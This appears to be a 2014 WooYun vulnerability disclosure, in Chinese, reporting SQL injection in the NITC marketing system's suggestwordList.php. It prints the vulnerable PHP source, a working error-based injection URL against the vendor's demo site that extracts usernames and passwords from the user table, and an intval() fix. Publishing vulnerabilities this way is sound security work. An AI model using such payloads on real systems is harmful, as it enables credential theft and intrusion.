NITC营销系统SQL注入漏洞 | wooyun-2014-066683

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-066683

漏洞标题：

NITC营销系统SQL注入漏洞

漏洞详情

披露状态：

2014-07-02：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-09-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

官网已复现

详细说明：

注入出现在suggestwordList.php

<?php
define( "IN_LOCK", true );
require( "./includes/init.php" );
$searchWord = trim( $_GET['searchWord'] );
$searchWord1 = str_replace( "\\", "", $searchWord );
if ( $searchWord )
{
    $sql = "select model as keyword from ".$site->table( "product" ).( " where model like '".$searchWord."%' order by model limit 30" );
    $re1 = $db->getAll( $sql );
    $sql = "select product_desc.name as keyword from ".$site->table( "product" )." as product left join ".$site->table( "product_desc" ).( " as product_desc on product.product_id=product_desc.product_id where product.state=0  and (product_desc.name like '".$searchWord."%') and product_desc.language_id=" ).$_GET['language'];// 未作任何过滤，无视gpc
    $re2 = $db->getAll( $sql );
    $re = array_merge( $re1, $re2 );
    if ( empty( $re ) )
    {
        echo "<ul>";
        foreach ( $re as $val )
        {
            echo "\r\n<li>\r\n\t<span class=\"suggword\"><span class=\"keyin\">";
            echo $searchWord1;
            echo "</span>";
            echo substr( $val['keyword'], strlen( $searchWord1 ) );
            echo "</span>\r\n</li>\r\n\r\n\r\n";
        }
        echo "</ul>";
    }
}
?>

官网测试：
http://demo.cnnitc.com/suggestwordList.php?searchWord=a&language=1%20AND%20(SELECT 1 FROM(SELECT COUNT(*),CONCAT(floor(rand(0)*2),(select concat(user_name,0x23,password) from nitc_user limit 0,1))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)

漏洞证明：

修复方案：

$language=intval($_GET['language']);

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞